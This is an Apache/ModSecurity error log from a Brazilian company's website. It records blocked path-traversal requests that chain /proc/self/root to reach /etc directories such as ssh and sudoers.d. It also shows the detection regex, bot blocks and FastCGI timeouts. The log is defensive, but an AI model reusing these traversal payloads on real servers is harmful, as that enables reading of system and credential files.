[Tue Mar 17 18:09:11.125891 2026] [proxy_fcgi:error] [pid 2598:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39826] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:09:29.917210 2026] [:error] [pid 6296:tid 140411590858496] [client 74.7.241.31:58834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnDCXIk7brgkOH-rIWjoAAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:09:35.137792 2026] [proxy_fcgi:error] [pid 7004:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:40060] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:09:36.899966 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:34776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnDEOyqAr6etmhZHNo-qwAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:09:38.594373 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.241.31:54630] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnDEgeiSKl8TjouI-YuogAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:09:47.950794 2026] [:error] [pid 7437:tid 140411574073088] [client 74.7.241.31:54630] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnDGweiSKl8TjouI-YuqAAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:09:59.133847 2026] [proxy_fcgi:error] [pid 19507:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40432] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:10:22.065878 2026] [proxy_fcgi:error] [pid 7437:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:40788] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:10:25.086115 2026] [:error] [pid 25836:tid 140411632822016] [client 74.7.244.43:34068] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnDQYh-PF_25v4hFRCBvwAAAQ0"]
[Tue Mar 17 18:10:25.825305 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.228.61:57882] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnDQaBJNF7axNlVR0UvjAAAAA4"]
[Tue Mar 17 18:10:29.605427 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.241.31:44898] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnDRRj0p0SRWAqcjGGRMQAAAxY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:10:30.912739 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.31:35302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnDRgeiSKl8TjouI-YurgAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:10:32.367950 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:35314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnDSOyqAr6etmhZHNo-ugAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:10:33.833511 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:35324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnDSda6ubjKNq_cu4Ye3wAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:10:48.121840 2026] [proxy_fcgi:error] [pid 7004:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:41196] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:10:49.944730 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.241.31:35340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnDWQeiSKl8TjouI-YutAAAA8M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:11:00.254611 2026] [:error] [pid 29151:tid 140411548894976] [client 74.7.243.128:34284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnDZPPqhzTj3BvfDX-evgAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:11:17.057891 2026] [proxy_fcgi:error] [pid 25836:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:41738] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:11:39.117924 2026] [proxy_fcgi:error] [pid 7437:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:42000] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:11:45.298332 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:59054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnDkeyqAr6etmhZHNo-6QAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:12:02.053879 2026] [proxy_fcgi:error] [pid 2598:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42176] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:12:24.117838 2026] [proxy_fcgi:error] [pid 2598:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42524] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:12:26.110790 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:52980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnDuuyqAr6etmhZHNo--wAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:12:46.030483 2026] [proxy_fcgi:error] [pid 2473:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42902] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:12:51.101609 2026] [:error] [pid 29151:tid 140411641214720] [client 74.7.243.128:43170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnD0_PqhzTj3BvfDX-e2gAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:12:51.821401 2026] [:error] [pid 29151:tid 140411574073088] [client 74.7.243.128:43170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnD0_PqhzTj3BvfDX-e2wAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:13:07.133793 2026] [proxy_fcgi:error] [pid 19507:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43164] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:13:26.931991 2026] [:error] [pid 25836:tid 140411574073088] [client 74.7.243.128:47746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnD9oh-PF_25v4hFRCB7AAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:13:29.126010 2026] [proxy_fcgi:error] [pid 19507:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43478] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:13:50.129973 2026] [proxy_fcgi:error] [pid 7437:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:43928] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:14:01.919279 2026] [core:alert] [pid 26799:tid 140411649607424] [client 216.73.216.191:43788] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Tue Mar 17 18:14:11.125814 2026] [proxy_fcgi:error] [pid 2473:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:44390] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:14:32.121859 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:44848] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:14:54.045721 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:45282] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:15:16.129813 2026] [proxy_fcgi:error] [pid 6296:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45564] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:15:25.207483 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.244.43:59798] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnEbeyqAr6etmhZHNo_RwAAAFA"]
[Tue Mar 17 18:15:26.289677 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.228.61:55318] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnEbta6ubjKNq_cu4YfKgAAA1Q"]
[Tue Mar 17 18:15:38.129795 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45878] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:15:41.127760 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.241.31:41206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnEfRj0p0SRWAqcjGGRyQAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:16:01.122594 2026] [proxy_fcgi:error] [pid 2598:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:46170] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:16:02.745934 2026] [core:alert] [pid 2598:tid 140411616036608] [client 74.7.241.31:41206] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var
[Tue Mar 17 18:16:10.139771 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:41448] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnEmtY0UrI5A3LftIwVYgAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
